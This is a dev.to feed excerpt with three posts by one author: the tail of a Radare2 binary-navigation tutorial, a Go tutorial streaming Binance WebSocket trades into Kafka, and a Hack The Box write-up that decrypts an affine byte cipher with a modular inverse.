&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--TU895_1J--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AH5CZ_LuCF1c8yP86" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--TU895_1J--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AH5CZ_LuCF1c8yP86" alt="" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Views and Disassembly
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Press V to access various views of the binary file.&lt;/li&gt;
&lt;li&gt;Type p to switch between different views like hex, disassembly, debugger, ASCII hex, diffuse, and color visual.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Hex View Example
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--GwVe9oZb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE68ZMf68sFTlZ_YL" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--GwVe9oZb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE68ZMf68sFTlZ_YL" alt="" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enter to select the first line in the disassembler (similar to double-clicking a line).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Steps for Analysis
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Enter Seeker mode by typing Shift+:.&lt;/li&gt;
&lt;li&gt;In the Seeker mode, use Shift+: under the disassembly mode.&lt;/li&gt;
&lt;li&gt;Analyze the binary by typing aaa and pressing Enter.&lt;/li&gt;
&lt;li&gt;Display the functions in the binary with afl.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YjhSQJ4p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE4zu4P2QBCf_6tdl" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YjhSQJ4p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE4zu4P2QBCf_6tdl" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;To focus on the main code, type s main and press Enter twice.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8ezbR9Ql--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AyM6A6jpfvTIRrmwm" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8ezbR9Ql--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AyM6A6jpfvTIRrmwm" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Explore the main code of the disassembly.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;When entering a printf or similar function during reverse engineering, press Enter to view the stub code.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--T6FcSZD3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A6yFAezKPlVpN-k0M" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--T6FcSZD3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A6yFAezKPlVpN-k0M" alt="" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Note
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;To navigate back, press U.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;By using Radare2 for static navigation and disassembly, you’ve gained a foundational understanding of binary analysis. This tool provides a robust set of commands for inspecting, analyzing, and navigating through binaries. As you continue your journey with Radare2, you’ll unlock its full potential in reverse engineering and binary analysis.&lt;/p&gt;

&lt;p&gt;Experiment with different commands, explore various views, and deepen your comprehension of binary structures. The insights gained from static analysis will prove invaluable as you progress in your understanding of Radare2.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Stay tuned for the next part, where we’ll dive into advanced features and real-world examples. In Part 2, we’ll explore dynamic analysis, debugging, and more cool aspects of Radare2. Get ready for the next chapter in your Radare2 learning adventure!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/radare2/tree/main"&gt;GitHub - Kamalesh-Seervi/radare2&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ctf</category>
      <category>cybersecurity</category>
      <category>reverseengineering</category>
      <category>hacking</category>
    </item>
    <item>
      <title>Real-Time Trading App: Golang, Kafka, Websockets — Setting up Kafka in Golang (PART-2)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Tue, 19 Dec 2023 15:36:39 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-kafka-in-golang-part-2-2bjo</link>
      <guid>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-kafka-in-golang-part-2-2bjo</guid>
      <description>&lt;h3&gt;
  
  
  &lt;strong&gt;Real-Time Trading App: Golang, Kafka, Websockets — Setting up Kafka in Golang (PART-2)&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Configuring Kafka in a Golang environment and creating a build file for the producer.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--DAU43kBM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AoIqi57mf6vBHV1gA" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--DAU43kBM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AoIqi57mf6vBHV1gA" alt="golang kafka" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;This marks &lt;strong&gt;Part 2&lt;/strong&gt; of our real-time trade app series in Golang. In this installment, we’ll dive into coding for Kafka, focusing on establishing a connection and creating a producer build file. This step is crucial for testing the API connection to Binance’s web sockets. Stay tuned for hands-on coding and insights into optimizing the integration!&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  Establishing a connection with the data source.
&lt;/h4&gt;

&lt;p&gt;As previously noted, we’ll utilize Binance’s WebSocket API as our data source. Within your app folder, create a &lt;strong&gt;trades&lt;/strong&gt; subfolder and include the following files: &lt;strong&gt;listener.go, publish.go, and ticker.go&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--r2MeHIMu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZimK6YdCx6wCFFnP866bSg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--r2MeHIMu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZimK6YdCx6wCFFnP866bSg.png" alt="kafka golang" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Ticker.go
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Within ticker.go, you’ll find the model for the ticker data sourced from Binance. This model serves a dual purpose, as it will be employed for both receiving and publishing the data.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package trades

type Ticker struct {
 Symbol string `json:"s"`
 Price string `json:"p"`
 Quantity string `json:"q"` 
 Time int64 `json:"T"`
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Listener.go
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;As the name implies, listener.go houses the code where we actively listen for specific tickers through a WebSocket connection. Let’s delve into the details, starting with the establishment of the WebSocket connection.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package trades

import (
 "encoding/json"
 "log"
 "net/url"

 "github.com/gorilla/websocket"
)

type RequestParams struct {
 Id int `json:"id"`
 Method string `json:"method"`
 Params []string `json:"params"`
}

var conn *websocket.Conn

const (
 subscribeId = 1
 unSubscribeId = 2
)

func getConnection() (*websocket.Conn, error) {
 if conn != nil {
  return conn, nil
 }

 u := url.URL{Scheme: "wss", Host: "stream.binance.com:443", Path: "/ws"}
 log.Printf("connecting to %s", u.String())
 c, resp, err := websocket.DefaultDialer.Dial(u.String(), nil)
 if err != nil {
  log.Printf("handshake failed with status %d", resp.StatusCode)
  log.Fatal("dial:", err)
 }
 conn = c

 return conn, nil
}

func CloseConnections() {
 conn.Close()
}

func EstablishConnection() (*websocket.Conn, error) {
 newConnection, err := getConnection()
 if err != nil {
  log.Fatal("Failed to get connection %s", err.Error())
  return nil, err
 }
 return newConnection, nil
}

func AddOnConnectionClose(h func(code int, text string) error) {
 conn.SetCloseHandler(h)
}

func unsubscirbeOnClose(conn *websocket.Conn, tradeTopics []string) error {
 message := struct {
  Id int `json:"id"`
  Method string `json:"method"`
  Params []string `json:"params"`
 }{
  Id: unSubscribeId,
  Method: "UNSUBSCRIBE",
  Params: tradeTopics,
 }

 b, err := json.Marshal(message)
 if err != nil {
  log.Fatal("Failed to JSON Encode trade topics")
  return err
 }

 err = conn.WriteMessage(websocket.TextMessage, b)

 return nil
}

func SubScribeAndListen(topics []string) error {
 conn, err := getConnection()
 if err != nil {
  log.Fatal("Failed to get connection %s", err.Error())
  return err
 }

 conn.SetPongHandler(func(appData string) error {
  log.Println("Received pong:", appData)
  pingFrame := []byte{1, 2, 3, 4, 5}
  err := conn.WriteMessage(websocket.PingMessage, pingFrame)
  if err != nil {
   log.Println(err)
   // no need to fail
  }
  return nil
 })

 tradeTopics := make([]string, 0, len(topics))
 for _, topic := range topics {
  tradeTopics = append(tradeTopics, topic+"@"+"aggTrade")
 }
 log.Println("Listening to trades for ", tradeTopics)
 message := RequestParams{
  Id: subscribeId,
  Method: "SUBSCRIBE",
  Params: tradeTopics,
 }
 log.Println(message)
 b, err := json.Marshal(message)
 if err != nil {
  log.Fatal("Failed to JSON Encode trade topics")
  return err
 }

 err = conn.WriteMessage(websocket.TextMessage, b)
 if err != nil {
  log.Fatal("Failed to subscribe to topics " + err.Error())
  return err
 }

 defer unsubscirbeOnClose(conn, tradeTopics)
 defer conn.Close()

 for {
  _, payload, err := conn.ReadMessage()
  if err != nil {
   log.Println(err)
   return err
  }

  trade := Ticker{}

  err = json.Unmarshal(payload, &amp;amp;trade)
  if err != nil {
   log.Println(err)
   return err
  }

  log.Println(trade.Symbol, trade.Price, trade.Quantity)
 }
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This code defines the listener functionality for the real-time trading app, focusing on establishing a WebSocket connection and handling incoming ticker data from Binance. Let’s break it down:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Imports:&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;Necessary packages are imported, including &lt;strong&gt;“github.com/gorilla/websocket”&lt;/strong&gt; for WebSocket communication and &lt;strong&gt;“github.com/segmentio/kafka-go”&lt;/strong&gt; for Kafka integration.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Data Structures:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;RequestParams:&lt;/strong&gt; Struct to represent the parameters for the WebSocket request.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;conn:&lt;/strong&gt; Variable to store the WebSocket connection.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Constants:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;subscribeId&lt;/strong&gt; and &lt;strong&gt;unSubscribeId&lt;/strong&gt; : Constants representing subscription and unsubscription identifiers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Functions:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;getConnection()&lt;/strong&gt;: Establishes a WebSocket connection to Binance’s streaming service.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CloseConnections()&lt;/strong&gt;: Closes the WebSocket connection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;EstablishConnection()&lt;/strong&gt;: Ensures a connection is established; if not, initiates a new one.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AddOnConnectionClose(h func(code int, text string) error)&lt;/strong&gt;: Adds a handler for WebSocket connection closure.
&lt;strong&gt;unsubscirbeOnClose(conn *websocket.Conn, tradeTopics []string) error&lt;/strong&gt;: Unsubscribes from specified trade topics upon connection closure.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SubScribeAndListen(topics []string) error&lt;/strong&gt;: Subscribes to specified trade topics and listens for incoming data, then converts and publishes it to Kafka.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. WebSocket Operations:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
 — Connection handling, ping-pong setup, subscription to trade topics, and handling incoming messages are managed.  &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. Data Processing:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
 — Upon receiving trade data, it’s deserialized into a &lt;code&gt;Ticker&lt;/code&gt; struct. The data is then logged, and a goroutine is spawned to convert and publish the data to Kafka.&lt;/p&gt;

&lt;p&gt;This comprehensive listener code sets the foundation for actively retrieving and processing real-time trading data from Binance through WebSockets, preparing it for further integration and analysis in the application.&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Testing&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Execute this code by invoking the SubScribeAndListen function in your main.go file.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
 "fmt"
 "os"
 "strings"
 "github.com/joho/godotenv"
  "github.com/kamalesh-seervi/trade-app/producer/trades" // &amp;lt;==== add this or it will autoadd
)

func main() {
 err := godotenv.Load("../.env")
 if err != nil {
  fmt.Print("Failed to load environment")
 }
 t := os.Getenv("TICKERS")
 topics := strings.Split(t, ",")
 for i,topic := range topics {
  topics[i] = strings.Trim(strings.Trim(topic,"\\"),"\"") 
 }

trades.SubScribeAndListen( // We need to add this to make it work and listen the websocket.
  topics,
 )

}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ul&gt;
&lt;li&gt;Build and run the app.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go build . &amp;amp;&amp;amp; ./trade-app // change it accordingly
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--X6hjFaqY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ACDGiw5GNg_fUXsms3u0qmQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--X6hjFaqY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ACDGiw5GNg_fUXsms3u0qmQ.png" alt="" width="800" height="267"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Realtime Data from the Binance API&lt;/em&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Publish.go&lt;/strong&gt;
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package trades

import (
 "context"
 "log"
 "github.com/segmentio/kafka-go"
)

var (
 HOST string
 PORT string
);

func LoadHostAndPort(host string, port string){
 HOST = host
 PORT = port
} 

func Publish(t string, message kafka.Message, topic string) error {

 messages := []kafka.Message{
  message,
 }

 w := kafka.Writer{
  Addr: kafka.TCP(HOST + ":" + PORT), //127.0.0.1:9092 or kafka:9092 in docker
  Topic: topic,
  AllowAutoTopicCreation: true,
 }
 defer w.Close()

 err := w.WriteMessages(context.Background(), messages...)
 if err != nil {
  log.Println("Error writing msg to Kafka: ", err.Error())
  return err
 }

 log.Println("Publish msg to Kafka on topic: ", topic)

 return nil
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ul&gt;
&lt;li&gt;Integrate this function into the listener.go file to facilitate Kafka publishing.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;func SubScribeAndListen(topics []string) error {

  ...
  ...
  ...

 for {
  _, payload, err := conn.ReadMessage()
  if err != nil {
   log.Println(err)
   return err
  }

  trade := Ticker{}

  err = json.Unmarshal(payload, &amp;amp;trade)
  if err != nil {
   log.Println(err)
   return err
  }

  log.Println(trade.Symbol, trade.Price, trade.Quantity)
  go func() { // &amp;lt;=== here
   convertAndPublishToKafka(trade)
  }() 
 }
}

// add this function
func convertAndPublishToKafka(t Ticker) { 
 bytes, err := json.Marshal(t)
 if err != nil {
  log.Println("Error marshalling Ticker data", err.Error())
 }

 Publish(t.Symbol, kafka.Message{
  Key: []byte(t.Symbol + "-" + strconv.Itoa(int(t.Time))),
  Value: bytes,
 }, "trades-"+strings.ToLower(t.Symbol))
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;In the existing code snippet, a goroutine is initiated using the “go” keyword to concurrently execute the convertAndPublishToKafka function. Here's an explanation for your blog:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Logging Trade Data:&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;log.Println(trade.Symbol, trade.Price, trade.Quantity)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;This line logs essential details of the incoming trade data, providing visibility into the traded symbol, price, and quantity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Goroutine for Kafka Publishing:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go func() { convertAndPublishToKafka(trade) }(
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;By using a goroutine, this section ensures non-blocking execution of the convertAndPublishToKafka function. This approach enhances the overall efficiency of the application, allowing it to continue processing incoming trade data without waiting for the Kafka publishing process to complete.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. convertAndPublishToKafka Function:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;func convertAndPublishToKafka(t Ticker) { // ... (existing code) }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;This function takes the received trade data (Ticker object), marshals it into JSON format, and then publishes it to Kafka. Key details, such as the trading symbol and timestamp, are utilized for Kafka message formatting. Any errors during the marshaling process are appropriately logged.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Rlf5mVTF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AIwy2-jUf5b3sY5j41CoWag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Rlf5mVTF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AIwy2-jUf5b3sY5j41CoWag.png" alt="" width="800" height="220"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;We’ve wrapped up the implementation of our producer service. If you have any questions, feel free to leave a comment below. I’ll be sharing the complete code shortly as we progress through the series, so stay tuned for that.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;What’s coming up next?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Our next focus will be on the consumer service. In this part, we’ll be exposing a WebSocket API for the frontend. Data will be pushed to the frontend through a Kafka listener. Stay tuned for the upcoming content!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/Real-time-trade-app"&gt;GitHub - Kamalesh-Seervi/Real-time-trade-app: Kafka, WebSockets&lt;/a&gt;&lt;/p&gt;

</description>
      <category>finops</category>
      <category>go</category>
      <category>docker</category>
      <category>kafka</category>
    </item>
    <item>
      <title>BabyEncryption Hack The Box</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Fri, 15 Dec 2023 14:33:13 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/babyencryption-hack-the-box-gm0</link>
      <guid>https://dev.to/kamaleshseervi/babyencryption-hack-the-box-gm0</guid>
      <description>&lt;h4&gt;
  
  
  &lt;strong&gt;HTB | Crypto Challenge&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ZxCPdCb7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ajh_88Pqk7cOMTt0aHP0taQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ZxCPdCb7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ajh_88Pqk7cOMTt0aHP0taQ.png" alt="hackthebox" width="800" height="405"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;You are tasked with discovering the flag by deciphering the provided ciphertext. The challenge includes a Python script for decryption, but you need to modify the script before executing it. As a newcomer to Hack The Box (HTB), it’s uncertain whether this approach is standard or specific to this challenge. Let’s proceed without delay.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  Unzipping the file
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1eyE_vRv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxArgzof4gPJ1UGnRlCQw3g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1eyE_vRv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxArgzof4gPJ1UGnRlCQw3g.png" alt="" width="800" height="440"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Password&lt;/em&gt;&lt;/strong&gt; _ : hackthebox_&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;Upon extracting the archive, two additional files emerge: &lt;strong&gt;chall.py&lt;/strong&gt; housing the Python script for deciphering the ciphertext, and &lt;strong&gt;msg.enc&lt;/strong&gt; which stores the encrypted text. Now, let’s examine the contents of these files.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--d269V-R6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxCkmDRTayRcFD_2zKVUl7g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--d269V-R6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxCkmDRTayRcFD_2zKVUl7g.png" alt="" width="800" height="483"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;chall.py &amp;amp; msg.enc&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Executing the script will result in the following error messages.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dR2WSf5a--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A73MNGVxNAKnTjqfpFNBesA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dR2WSf5a--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A73MNGVxNAKnTjqfpFNBesA.png" alt="" width="800" height="105"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;error script&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;After spending a few moments attempting to resolve the errors, I opted to abandon that approach and chose to modify the script instead.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--QXF8An0_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AoZSBCwWisbvQtS0eaGX8Rg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--QXF8An0_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AoZSBCwWisbvQtS0eaGX8Rg.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Decode Script&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def decrypt(msg):
    pt = []
    for char in msg:
        char= char-18
        char=179*char%256
        pt.append(char)
    return bytes(pt)

with open("msg.enc") as f:
    ct=bytes.fromhex(f.read())
print(decrypt(ct))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The value 179 is used in the decryption script as part of the reverse operation to undo the multiplication and modulo operation performed during encryption. In the encryption script, there’s a line:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ct.append((123 * char + 18) % 256)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means during encryption, each character (char) is multiplied by 123, then 18 is added, and finally, the result is taken modulo 256.&lt;/p&gt;

&lt;p&gt;In the decryption script, the goal is to reverse this process. The line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;char = 179 * char % 256
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;performs the reverse calculation. It uses 179 as the modular multiplicative inverse of 123 modulo 256. In modular arithmetic, the modular multiplicative inverse of a number a modulo m is a number b such that (a * b) % m == 1. In this case, 179 is chosen because (123 * 179) % 256 == 1, allowing the decryption process to reverse the effect of the original multiplication and modulo operation.&lt;/p&gt;

&lt;h4&gt;
  
  
  Let’s execute it …
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--zURQENAe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A3aDPUJtp7gvMElUzjXVp2w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--zURQENAe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A3aDPUJtp7gvMElUzjXVp2w.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Flag&lt;/em&gt;&lt;/p&gt;

